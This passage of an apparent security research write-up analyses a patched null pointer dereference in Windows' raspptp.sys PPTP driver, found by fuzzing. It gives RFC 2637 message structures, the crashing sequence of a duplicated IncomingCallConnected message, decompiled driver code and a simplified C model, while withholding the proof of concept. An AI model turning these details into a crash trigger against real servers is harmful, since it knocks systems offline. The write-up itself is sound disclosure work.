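    addr.sin_port   = htons(1723);              // PPTP control connection port
    inet_pton(AF_INET, serverIp, &addr.sin_addr);

    connect(s, (struct sockaddr *)&addr, sizeof(addr));
    return s;   // the caller then sends a StartControlConnectionRequest
}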

When fuzzing for vulnerabilities the first step is usually a case of waiting patiently for a crash to occur. In the case of fuzzing the PPTP implementation we had to wait a mere three minutes before our first reproducible crash!

Our first step was to analyse the crashing test case and minimise it to create a reliable proof of concept. However before we dissect the test case we need to understand what a few key parts of the control connection logic are trying to do!

The PPTP Handshake

PPTP implements a very simple control connection handshake procedure. All that is required is that a client first sends a StartControlConnectionRequest to the server and then receives a StartControlConnectionReply indicating that there were no issues and the control connection is ready to start processing commands. The actual contents of the StartControlConnectionRequest have no effect on the test case; it just needs to be validly formed so that the server progresses the connection state to the point where it can process the rest of the defined control connection frames. If you're interested in what all of these control frames are supposed to do or contain, you can find the details in the PPTP RFC (https://datatracker.ietf.org/doc/html/rfc2637).
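
For completeness, this is what that message looks like on the wire according to RFC 2637; as noted above, the exact field values largely don't matter as long as the frame is well formed.

#include <stdint.h>

// Start-Control-Connection-Request, per RFC 2637 (all fields big endian).
#pragma pack(push, 1)
typedef struct _PPTP_SCCRQ {
    uint16_t Length;              // 156
    uint16_t PptpMessageType;     // 1 = control message
    uint32_t MagicCookie;         // 0x1A2B3C4D
    uint16_t ControlMessageType;  // 1 = Start-Control-Connection-Request
    uint16_t Reserved0;
    uint16_t ProtocolVersion;     // 0x0100
    uint16_t Reserved1;
    uint32_t FramingCapabilities;
    uint32_t BearerCapabilities;
    uint16_t MaximumChannels;
    uint16_t FirmwareRevision;
    uint8_t  HostName[64];
    uint8_t  VendorString[64];
} PPTP_SCCRQ;
#pragma pack(pop)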

PPTP IncomingCall Setup Procedure

In order to forward network data to a PPTP VPN server, the control connection needs to establish a virtual call with the server. There are two types of virtual call when communicating with a PPTP server: outgoing calls and incoming calls. To communicate with a VPN server from a client we typically use the incoming call variety. To set up an incoming call from a client to a server, three control message types are used.

  • IncomingCallRequest – Used by the client to request a new incoming virtual call.
  • IncomingCallReply – Used by the server to indicate whether the virtual call is being accepted. It also sets up the call IDs for tracking the call (these IDs are then used for multiplexing network data as well).
  • IncomingCallConnected – Used by the client to confirm connection of the virtual call and causes the server to fully initialise it ready for network data.

The most important piece of information exchanged during call setup is the call ID. This is the ID used by the client and server to send and receive data along that particular call. Once a call is set up, data can be sent to the GRE part of the PPTP connection, using the call ID to identify the virtual call it belongs to.
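
The message at the heart of the test case is IncomingCallConnected. Per RFC 2637 its layout is as follows; the PeersCallId field carries the call ID the server handed out in its IncomingCallReply, and it is this value that raspptp.sys later uses to look the call context back up.

#include <stdint.h>

// Incoming-Call-Connected control message, per RFC 2637 (all fields big endian).
#pragma pack(push, 1)
typedef struct _PPTP_INCOMING_CALL_CONNECTED {
    uint16_t Length;                // 28
    uint16_t PptpMessageType;       // 1 = control message
    uint32_t MagicCookie;           // 0x1A2B3C4D
    uint16_t ControlMessageType;    // 11 = Incoming-Call-Connected
    uint16_t Reserved0;
    uint16_t PeersCallId;           // the call ID the server chose in Incoming-Call-Reply
    uint16_t Reserved1;
    uint32_t ConnectSpeed;
    uint16_t ReceiveWindowSize;
    uint16_t PacketProcessingDelay;
    uint32_t FramingType;
} PPTP_INCOMING_CALL_CONNECTED;
#pragma pack(pop)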

The Test Case

After reducing the test case, we can see that at a high level the control message exchanges that cause the server to crash are as follows:

StartControlConnectionRequest() Client -> Server
StartControlConnectionReply() Server -> Client
IncomingCallRequest() Client -> Server
IncomingCallReply() Server -> Client
IncomingCallConnected() Client -> Server
IncomingCallConnected() Client -> Server

The test case initially appears to be very simple, and it mostly resembles what we would expect of a valid PPTP connection. The difference is the second IncomingCallConnected message. For some reason, upon receiving an IncomingCallConnected control message for a call ID that is already connected, a null pointer dereference is triggered, causing a system crash.

Let’s look at the crash and see if we can see why this relatively simple error causes such a large issue.

The Crash

Looking at the stack trace for the crash we get the following:

... <- (Windows Bug check handling)
NDIS!NdisMCmActivateVc+0x2d
raspptp!CallEventCallInConnect+0x71
raspptp!CtlpEngine+0xe63
raspptp!CtlReceiveCallback+0x4b
... <- (TCP/IP Handling)

What's interesting here is that the crash does not take place in the raspptp.sys driver at all, but instead occurs in the ndis.sys driver. What is ndis.sys? Well, raspptp.sys is what is referred to as a miniport driver, which means it only implements a small part of the functionality required for an entire VPN interface; the rest of the VPN handling is performed by the NDIS driver system. raspptp.sys acts as a front-end parser for PPTP which forwards the encapsulated virtual network frames on to NDIS, to be routed and handled by the rest of the Windows VPN back-end.

So why is this null pointer dereference happening? Let’s look at the code to see if we can glean any more detail.

The Code

The first section of code is in the PPTP control connection state machine. The first part of this handling is a small stub in a switch statement for handling the different control messages. For an IncomingCallConnected message, we can see that all the code initially does is check that a valid call ID and context structure exist on the server. If they do exist, a call is made to the CallEventCallInConnect function with the message payload and the call context structure.

case IncomingCallConnected:
    // Ensure the client has sent a valid StartControlConnectionRequest message
    if ( lpPptpCtlCx->CtlCurrentState == CtlStateWaitStop )
    {
        // BigEndian To LittleEndian Conversion
        CallIdSentInReply = (unsigned __int16)__ROR2__(lpCtlPayloadBuffer->IncomingCallConnected.PeersCallId, 8);
        if ( PptpClientSide ) // If we are the client
            CallIdSentInReply &= 0x3FFFu; // Maximum ID mask
        // Get the context structure for this call ID if it exists
        IncomingCallCallCtx = CallGetCall(lpPptpCtlCx->pPptpAdapterCtx, CallIdSentInReply);
        // Handle the incoming call connected event
        if ( IncomingCallCallCtx )
            CallEventCallInConnect(IncomingCallCallCtx, lpCtlPayloadBuffer);

The CallEventCallInConnect function performs two tasks; it activates the virtual call connection through a call to NdisMCmActivateVc and then if the returned status from that function is not STATUS_PENDING it calls the PptpCmActivateVcComplete function.

__int64 __fastcall CallEventCallInConnect(CtlCall *IncomingCallCallCtx, CtlMsgStructs *IncomingCallMsg)
{
    unsigned int ActiveateVcRetCode;
    ...
    ActiveateVcRetCode = NdisMCmActivateVc(lpCallCtx->NdisVcHandle, (PCO_CALL_PARAMETERS)lpCallCtx->CallParams);
    if ( ActiveateVcRetCode != STATUS_PENDING )
    {
        if...
            PptpCmActivateVcComplete(ActiveateVcRetCode, lpCallCtx, (PVOID)lpCallCtx->CallParams);
    }
    return 0i64;
}

...

NDIS_STATUS __stdcall NdisMCmActivateVc(NDIS_HANDLE NdisVcHandle, PCO_CALL_PARAMETERS CallParameters)
{
    __int64 v2; // rbx
    PCO_CALL_PARAMETERS lpCallParameters; // rdi
    KIRQL OldIRQL; // al
    _CO_MEDIA_PARAMETERS *lpMediaParameters; // rcx
    __int64 v6; // rcx

    v2 = *((_QWORD *)NdisVcHandle + 9);
    lpCallParameters = CallParameters;
    OldIRQL = KeAcquireSpinLockRaiseToDpc((PKSPIN_LOCK)(v2 + 8));
    *(_DWORD *)(v2 + 4) |= 1u;
    lpMediaParameters = lpCallParameters->MediaParameters;
    if ( lpMediaParameters->MediaSpecific.Length < 8 )
        v6 = (unsigned int)v2;
    else
        v6 = *(_QWORD *)lpMediaParameters->MediaSpecific.Parameters;

    *(_QWORD *)(v2 + 136) = v6;
    *(_QWORD *)(v2 + 136) = *(_QWORD *)lpCallParameters->MediaParameters->MediaSpecific.Parameters;
    KeReleaseSpinLock((PKSPIN_LOCK)(v2 + 8), OldIRQL);
    return 0;
}

We can see that in reality the NdisMCmActivateVc function is surprisingly simple. We know that it always returns 0, so there will always be a subsequent call to PptpCmActivateVcComplete from the CallEventCallInConnect function.

Looking at the stack trace we know that the crash is occurring at an offset of 0x2d into the NdisMCmActivateVc function which corresponds to the following line in our pseudo code:

lpMediaParameters = lpCallParameters->MediaParameters;

Since NdisMCmActivateVc doesn't sit in our main target driver, raspptp.sys, we haven't fully reverse engineered it, but it's clear that its main purpose is to set some properties on a structure which raspptp.sys tracks as its handle into NDIS. Since this doesn't appear to be directly causing the issue, we can safely ignore it for now. The variable responsible for the null pointer dereference, lpCallParameters (the CallParameters argument), is passed into the function by raspptp.sys; this indicates that the vulnerability must originate somewhere else in the raspptp.sys driver code.

Referring back to the call from CallEventCallInConnect, we know that the CallParameters argument is actually a pointer stored within the call context structure in raspptp.sys. We can assume that at some point in the call to PptpCmActivateVcComplete this allocation is freed and the pointer member of the structure is set to zero. So let's find the responsible line!

void __fastcall PptpCmActivateVcComplete(unsigned int OutGoingCallReplyStatusCode, CtlCall *CallContext, PVOID CallParams)
{
    CtlCall *lpCallContext; // rdi
    ...
    if ( lpCallContext->UnkownFlag )
    {
        if ( lpCallParams )
            ExFreePoolWithTag((PVOID)lpCallContext->CallParams, 0);

        lpCallContext->CallParams = 0i64;
        ...

After a little bit of looking we can see the responsible section of code. From reverse engineering the setup of the CallContext structure, we know that the UnkownFlag structure member is set to 1 by the handling of the IncomingCallRequest frame, where the CallContext structure is initially allocated and set up. For our test case this code will always execute, so the second call to CallEventCallInConnect triggers a null pointer dereference and crashes the machine in the NDIS layer, producing the appropriate Blue Screen of Death.
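
Putting the pieces together, the whole crash path can be modelled in a few lines of C. This is a simplified, self-contained model of the logic described above, not the driver's actual code.

#include <stdlib.h>

/* Simplified model of the double IncomingCallConnected flow (illustrative only). */
typedef struct { void *MediaParameters; } MODEL_CALL_PARAMETERS;
typedef struct {
    MODEL_CALL_PARAMETERS *CallParams;  /* freed and zeroed after the first activation */
    int UnkownFlag;                     /* set when the call was set up via IncomingCallRequest */
} MODEL_CALL_CTX;

static void ModelNdisMCmActivateVc(MODEL_CALL_PARAMETERS *CallParameters)
{
    /* NdisMCmActivateVc dereferences CallParameters->MediaParameters immediately,
     * so a NULL CallParameters pointer means an instant bug check. */
    void *media = CallParameters->MediaParameters;
    (void)media;
}

void ModelIncomingCallConnected(MODEL_CALL_CTX *ctx)
{
    ModelNdisMCmActivateVc(ctx->CallParams);  /* 2nd message: ctx->CallParams == NULL -> crash */

    if (ctx->UnkownFlag) {
        free(ctx->CallParams);                /* 1st message: parameters freed here... */
        ctx->CallParams = NULL;               /* ...and the pointer cleared, priming the crash */
    }
}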

Proof Of Concept

We will release proof of concept code on May 2nd to allow extra time for systems administrators to patch.

Timeline

  • Vulnerability reported to Microsoft – 29 Oct 2021
  • Vulnerability acknowledged – 29 Oct 2021
  • Vulnerability confirmed – 11 Nov 2021
  • Patch release date confirmed – 18 Jan 2022
  • Patch released – 08 March 2022
  • Blog released – 22 March 2022

